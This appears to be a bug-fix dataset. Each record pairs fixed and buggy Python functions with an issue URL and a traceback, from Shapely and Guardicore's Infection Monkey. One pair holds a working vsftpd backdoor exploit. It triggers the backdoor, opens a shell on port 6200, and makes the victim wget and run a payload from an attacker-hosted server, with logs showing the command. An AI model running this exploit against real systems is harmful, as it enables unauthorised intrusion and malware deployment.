File "/home/openerp/europortetest/railfleetng/ve/local/lib/python2.7/site-packages/shapely/ctypes_declarations.py", line 279, in prototype
lgeos.GEOSisClosed.restype = c_byte
File "/usr/lib/python2.7/ctypes/__init__.py", line 378, in __getattr__
func = self.__getitem__(name)
File "/usr/lib/python2.7/ctypes/__init__.py", line 383, in __getitem__
func = self._FuncPtr((name_or_ordinal, self))
AttributeError: /usr/lib/libgeos_c.so.1: undefined symbol: GEOSisClosed
|
AttributeError
|
def cleanup():
del lgeos
|
def cleanup():
lgeos.__del__()
|
https://github.com/Toblerity/Shapely/issues/106
|
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
Error in sys.exitfunc:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
|
AttributeError
|
def __del__(self):
"""Cleanup GEOS related processes"""
if self._lgeos is not None:
self._lgeos.finishGEOS()
self._lgeos = None
self.geos_handle = None
LOG.debug("GEOS Finished")
|
def __del__(self):
"""Cleanup GEOS related processes"""
if self._lgeos is not None:
self._lgeos.finishGEOS()
self._lgeos = None
self.geos_handle = None
|
https://github.com/Toblerity/Shapely/issues/106
|
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
Error in sys.exitfunc:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
|
AttributeError
|
def cleanup(proxy):
del proxy
|
def cleanup():
del lgeos
|
https://github.com/Toblerity/Shapely/issues/106
|
Error in atexit._run_exitfuncs:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
Error in sys.exitfunc:
Traceback (most recent call last):
File "/opt/python-2.7.6/lib/python2.7/atexit.py", line 24, in _run_exitfuncs
func(*targs, **kargs)
File "/home/kwilcox/.virtualenvs/larvamap/lib/python2.7/site-packages/shapely/geos.py", line 729, in cleanup
lgeos.__del__()
AttributeError: 'NoneType' object has no attribute '__del__'
|
AttributeError
|
def _exploit_host(self):
LOG.info("Attempting to trigger the Backdoor..")
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
ftp_socket.recv(RECV_128).decode("utf-8")
if self.socket_send_recv(ftp_socket, USERNAME + b"\n"):
time.sleep(FTP_TIME_BUFFER)
self.socket_send(ftp_socket, PASSWORD + b"\n")
ftp_socket.close()
LOG.info("Backdoor Enabled, Now we can run commands")
else:
LOG.error("Failed to trigger backdoor on %s", self.host.ip_addr)
return False
LOG.info("Attempting to connect to backdoor...")
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT):
LOG.info("Connected to backdoor on %s:6200", self.host.ip_addr)
uname_m = str.encode(UNAME_M + "\n")
response = self.socket_send_recv(backdoor_socket, uname_m)
if response:
LOG.info("Response for uname -m: %s", response)
if "" != response.lower().strip():
# command execution is successful
self.host.os["machine"] = response.lower().strip()
self.host.os["type"] = "linux"
else:
LOG.info("Failed to execute command uname -m on victim %r ", self.host)
src_path = get_target_monkey(self.host)
LOG.info(
"src for suitable monkey executable for host %r is %s", self.host, src_path
)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create a http server to host the monkey
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
dropper_target_path_linux = self._config.dropper_target_path_linux
LOG.info("Download link for monkey is %s", http_path)
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {
"monkey_path": monkey_path,
"http_path": http_path,
}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
LOG.info("Monkey is now Downloaded ")
else:
LOG.error("Failed to download monkey at %s", self.host.ip_addr)
return False
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send()
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
run_monkey = RUN_MONKEY % {
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)
if backdoor_socket.send(run_monkey):
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
run_monkey,
)
self.add_executed_cmd(run_monkey.decode())
return True
else:
return False
|
def _exploit_host(self):
LOG.info("Attempting to trigger the Backdoor..")
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
ftp_socket.recv(RECV_128).decode("utf-8")
if self.socket_send_recv(ftp_socket, USERNAME + b"\n"):
time.sleep(FTP_TIME_BUFFER)
self.socket_send(ftp_socket, PASSWORD + b"\n")
ftp_socket.close()
LOG.info("Backdoor Enabled, Now we can run commands")
else:
LOG.error("Failed to trigger backdoor on %s", self.host.ip_addr)
return False
LOG.info("Attempting to connect to backdoor...")
backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT):
LOG.info("Connected to backdoor on %s:6200", self.host.ip_addr)
uname_m = str.encode(UNAME_M + "\n")
response = self.socket_send_recv(backdoor_socket, uname_m)
if response:
LOG.info("Response for uname -m: %s", response)
if "" != response.lower().strip():
# command execution is successful
self.host.os["machine"] = response.lower().strip()
self.host.os["type"] = "linux"
else:
LOG.info("Failed to execute command uname -m on victim %r ", self.host)
src_path = get_target_monkey(self.host)
LOG.info(
"src for suitable monkey executable for host %r is %s", self.host, src_path
)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create a http server to host the monkey
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
dropper_target_path_linux = self._config.dropper_target_path_linux
LOG.info("Download link for monkey is %s", http_path)
# Upload the monkey to the machine
monkey_path = dropper_target_path_linux
download_command = WGET_HTTP_UPLOAD % {
"monkey_path": monkey_path,
"http_path": http_path,
}
download_command = str.encode(str(download_command) + "\n")
LOG.info("Download command is %s", download_command)
if self.socket_send(backdoor_socket, download_command):
LOG.info("Monkey is now Downloaded ")
else:
LOG.error("Failed to download monkey at %s", self.host.ip_addr)
return False
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
T1222Telem(ScanStatus.USED, change_permission, self.host).send()
# Run monkey on the machine
parameters = build_monkey_commandline(self.host, get_monkey_depth() - 1)
run_monkey = RUN_MONKEY % {
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
}
# Set unlimited to memory
# we don't have to revert the ulimit because it just applies to the shell obtained by our exploit
run_monkey = ULIMIT_V + UNLIMITED + run_monkey
run_monkey = str.encode(str(run_monkey) + "\n")
time.sleep(FTP_TIME_BUFFER)
if backdoor_socket.send(run_monkey):
LOG.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
run_monkey,
)
self.add_executed_cmd(run_monkey)
return True
else:
return False
|
https://github.com/guardicore/monkey/issues/616
|
2020-04-13 14:20:02,287 [7236:1716:INFO] vsftpd._exploit_host.102: src for suitable monkey executable for host VictimHost('192.168.56.101') is monkeyfs://monkey-linux-32
2020-04-13 14:20:07,142 [7236:1716:INFO] vsftpd._exploit_host.111: Download link for monkey is http://192.168.56.1:4059/monkey-linux-32
2020-04-13 14:20:07,142 [7236:1716:INFO] vsftpd._exploit_host.117: Download command is b'wget -O /tmp/monkey http://192.168.56.1:4059/monkey-linux-32\
'
2020-04-13 14:20:07,142 [7236:1716:INFO] vsftpd._exploit_host.119: Monkey is now Downloaded
2020-04-13 14:20:07,149 [7236:13508:DEBUG] http.log_message.108: FileServHTTPRequestHandler: 192.168.56.101 - - [13/Apr/2020 14:20:07] "GET /monkey-linux-32 HTTP/1.0" 200 -
2020-04-13 14:20:07,329 [7236:13508:INFO] http.report_download.252: File downloaded from (192.168.56.101,44962)
2020-04-13 14:20:07,329 [7236:13508:DEBUG] base_telem.send.25: Sending attack telemetry. Data: {"status": 2, "technique": "T1105", "filename": "monkeyfs://monkey-linux-32", "src": "192.168.56.1", "dst": "192.168.56.101"}
2020-04-13 14:20:07,331 [7236:13508:DEBUG] connectionpool._new_conn.959: Starting new HTTPS connection (1): 192.168.56.1:5000
2020-04-13 14:20:07,354 [7236:13508:DEBUG] connectionpool._make_request.437: https://192.168.56.1:5000 "POST /api/telemetry HTTP/1.1" 200 354
2020-04-13 14:20:07,355 [7236:1716:INFO] vsftpd._exploit_host.130: change_permission command is b'chmod +x /tmp/monkey\
'
2020-04-13 14:20:07,356 [7236:1716:ERROR] monkey.try_exploiting.342: Exception while attacking Victim Host 192.168.56.101: OS - [type-linux version-Unix machine-i686 ] Services - [tcp-22-{'display_name': 'SSH', 'port': 22, 'banner': 'SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\
', 'name': 'ssh', 'os-version': 'Debian-8ubuntu1'} tcp-80-{'display_name': 'HTTP', 'port': 80, 'name': 'http', 'data': ('Apache/2.2.8 (Ubuntu) DAV/2', False)} mysqld-3306-{'display_name': 'MySQL', 'port': 3306, 'version': '5.0.51a-3ubuntu5', 'major_version': '5', 'minor_version': '0', 'build_version': '51a', 'capabilities': 30003, 'extcapabilities': 12334} tcp-445-{'display_name': 'SMB', 'port': 445, 'name': 'Samba 3.0.20-Debian'} ] target monkey: monkeyfs://monkey-linux-32 using VSFTPDExploiter: Object of type bytes is not JSON serializable
Traceback (most recent call last):
File "monkey\\infection_monkey\\monkey.py", line 327, in try_exploiting
File "monkey\\infection_monkey\\exploit\\HostExploiter.py", line 71, in exploit_host
File "monkey\\infection_monkey\\exploit\\vsftpd.py", line 132, in _exploit_host
File "monkey\\infection_monkey\ elemetry\�ase_telem.py", line 25, in send
File "json\\__init__.py", line 231, in dumps
File "json\\encoder.py", line 199, in encode
File "json\\encoder.py", line 257, in iterencode
File "json\\encoder.py", line 179, in default
TypeError: Object of type bytes is not JSON serializable
|
TypeError
|
def do_CONNECT(self):
LOG.info("Received a connect request!")
# just provide a tunnel, transfer the data with no modification
req = self
req.path = "https://%s/" % req.path.replace(":443", "")
u = urlsplit(req.path)
address = (u.hostname, u.port or 443)
try:
conn = socket.create_connection(address)
except socket.error as e:
LOG.debug(
"HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
% (repr(address), e)
)
self.send_error(504) # 504 Gateway Timeout
return
self.send_response(200, "Connection Established")
self.send_header("Connection", "close")
self.end_headers()
conns = [self.connection, conn]
keep_connection = True
while keep_connection:
keep_connection = False
rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
if xlist:
break
for r in rlist:
other = conns[1] if r is conns[0] else conns[0]
data = r.recv(8192)
if data:
other.sendall(data)
keep_connection = True
update_last_serve_time()
conn.close()
|
def do_CONNECT(self):
# just provide a tunnel, transfer the data with no modification
req = self
req.path = "https://%s/" % req.path.replace(":443", "")
u = urlsplit(req.path)
address = (u.hostname, u.port or 443)
try:
conn = socket.create_connection(address)
except socket.error as e:
LOG.debug(
"HTTPConnectProxyHandler: Got exception while trying to connect to %s: %s"
% (repr(address), e)
)
self.send_error(504) # 504 Gateway Timeout
return
self.send_response(200, "Connection Established")
self.send_header("Connection", "close")
self.end_headers()
conns = [self.connection, conn]
keep_connection = True
while keep_connection:
keep_connection = False
rlist, wlist, xlist = select.select(conns, [], conns, self.timeout)
if xlist:
break
for r in rlist:
other = conns[1] if r is conns[0] else conns[0]
data = r.recv(8192)
if data:
other.sendall(data)
keep_connection = True
update_last_serve_time()
conn.close()
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def do_POST(self):
try:
content_length = int(self.headers["Content-Length"])
post_data = self.rfile.read(content_length).decode()
LOG.info("Received bootloader's request: {}".format(post_data))
try:
dest_path = self.path
r = requests.post(
url=dest_path,
data=post_data,
verify=False,
proxies=infection_monkey.control.ControlClient.proxies,
)
self.send_response(r.status_code)
except requests.exceptions.ConnectionError as e:
LOG.error("Couldn't forward request to the island: {}".format(e))
self.send_response(404)
except Exception as e:
LOG.error("Failed to forward bootloader request: {}".format(e))
finally:
self.end_headers()
self.wfile.write(r.content)
except Exception as e:
LOG.error("Failed receiving bootloader telemetry: {}".format(e))
|
def do_POST(self):
self.send_error(501, "Unsupported method (POST)")
return
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def init_api_resources(api):
api.add_resource(Root, "/api")
api.add_resource(Monkey, "/api/monkey", "/api/monkey/", "/api/monkey/<string:guid>")
api.add_resource(Bootloader, "/api/bootloader/<string:os>")
api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/")
api.add_resource(ClientRun, "/api/client-monkey", "/api/client-monkey/")
api.add_resource(
Telemetry,
"/api/telemetry",
"/api/telemetry/",
"/api/telemetry/<string:monkey_guid>",
)
api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/")
api.add_resource(
IslandConfiguration, "/api/configuration/island", "/api/configuration/island/"
)
api.add_resource(
MonkeyDownload,
"/api/monkey/download",
"/api/monkey/download/",
"/api/monkey/download/<string:path>",
)
api.add_resource(NetMap, "/api/netmap", "/api/netmap/")
api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/")
api.add_resource(Node, "/api/netmap/node", "/api/netmap/node/")
api.add_resource(NodeStates, "/api/netmap/nodeStates")
# report_type: zero_trust or security
api.add_resource(
Report,
"/api/report/<string:report_type>",
"/api/report/<string:report_type>/<string:report_data>",
)
api.add_resource(TelemetryFeed, "/api/telemetry-feed", "/api/telemetry-feed/")
api.add_resource(Log, "/api/log", "/api/log/")
api.add_resource(IslandLog, "/api/log/island/download", "/api/log/island/download/")
api.add_resource(PBAFileDownload, "/api/pba/download/<string:path>")
api.add_resource(
FileUpload,
"/api/fileUpload/<string:file_type>",
"/api/fileUpload/<string:file_type>?load=<string:filename>",
"/api/fileUpload/<string:file_type>?restore=<string:filename>",
)
api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/")
api.add_resource(AttackConfiguration, "/api/attack")
api.add_resource(AttackReport, "/api/attack/report")
api.add_resource(VersionUpdate, "/api/version-update", "/api/version-update/")
api.add_resource(MonkeyTest, "/api/test/monkey")
api.add_resource(ClearCaches, "/api/test/clear_caches")
api.add_resource(LogTest, "/api/test/log")
|
def init_api_resources(api):
api.add_resource(Root, "/api")
api.add_resource(Monkey, "/api/monkey", "/api/monkey/", "/api/monkey/<string:guid>")
api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/")
api.add_resource(ClientRun, "/api/client-monkey", "/api/client-monkey/")
api.add_resource(
Telemetry,
"/api/telemetry",
"/api/telemetry/",
"/api/telemetry/<string:monkey_guid>",
)
api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/")
api.add_resource(
IslandConfiguration, "/api/configuration/island", "/api/configuration/island/"
)
api.add_resource(
MonkeyDownload,
"/api/monkey/download",
"/api/monkey/download/",
"/api/monkey/download/<string:path>",
)
api.add_resource(NetMap, "/api/netmap", "/api/netmap/")
api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/")
api.add_resource(Node, "/api/netmap/node", "/api/netmap/node/")
# report_type: zero_trust or security
api.add_resource(
Report,
"/api/report/<string:report_type>",
"/api/report/<string:report_type>/<string:report_data>",
)
api.add_resource(TelemetryFeed, "/api/telemetry-feed", "/api/telemetry-feed/")
api.add_resource(Log, "/api/log", "/api/log/")
api.add_resource(IslandLog, "/api/log/island/download", "/api/log/island/download/")
api.add_resource(PBAFileDownload, "/api/pba/download/<string:path>")
api.add_resource(
FileUpload,
"/api/fileUpload/<string:file_type>",
"/api/fileUpload/<string:file_type>?load=<string:filename>",
"/api/fileUpload/<string:file_type>?restore=<string:filename>",
)
api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/")
api.add_resource(AttackConfiguration, "/api/attack")
api.add_resource(AttackReport, "/api/attack/report")
api.add_resource(VersionUpdate, "/api/version-update", "/api/version-update/")
api.add_resource(MonkeyTest, "/api/test/monkey")
api.add_resource(ClearCaches, "/api/test/clear_caches")
api.add_resource(LogTest, "/api/test/log")
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def main():
logger.info("Starting bootloader server")
mongo_url = os.environ.get("MONGO_URL", env.get_mongo_url())
bootloader_server_thread = Thread(
target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True
)
bootloader_server_thread.start()
start_island_server()
bootloader_server_thread.join()
|
def main():
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
mongo_url = os.environ.get("MONGO_URL", env.get_mongo_url())
wait_for_mongo_db_server(mongo_url)
assert_mongo_db_version(mongo_url)
populate_exporter_list()
app = init_app(mongo_url)
crt_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server.crt")
key_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server.key")
if env.is_debug():
app.run(host="0.0.0.0", debug=True, ssl_context=(crt_path, key_path))
else:
http_server = HTTPServer(
WSGIContainer(app),
ssl_options={
"certfile": os.environ.get("SERVER_CRT", crt_path),
"keyfile": os.environ.get("SERVER_KEY", key_path),
},
)
http_server.listen(env.get_island_port())
log_init_info()
IOLoop.instance().start()
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def get_edge_label(edge):
node_service = monkey_island.cc.services.node.NodeService
from_id = edge["from"]
to_id = edge["to"]
try:
from_label = Monkey.get_label_by_id(from_id)
except MonkeyNotFoundError:
from_label = node_service.get_node_by_id(from_id)["domain_name"]
if to_id == ObjectId("000000000000000000000000"):
to_label = "MonkeyIsland"
else:
if Monkey.is_monkey(to_id):
to_label = Monkey.get_label_by_id(to_id)
else:
to_label = node_service.get_node_label(node_service.get_node_by_id(to_id))
return "%s %s %s" % (from_label, RIGHT_ARROW, to_label)
|
def get_edge_label(edge):
node_service = monkey_island.cc.services.node.NodeService
from_id = edge["from"]
to_id = edge["to"]
from_label = Monkey.get_label_by_id(from_id)
if to_id == ObjectId("000000000000000000000000"):
to_label = "MonkeyIsland"
else:
if Monkey.is_monkey(to_id):
to_label = Monkey.get_label_by_id(to_id)
else:
to_label = node_service.get_node_label(node_service.get_node_by_id(to_id))
return "%s %s %s" % (from_label, RIGHT_ARROW, to_label)
|
https://github.com/guardicore/monkey/issues/528
|
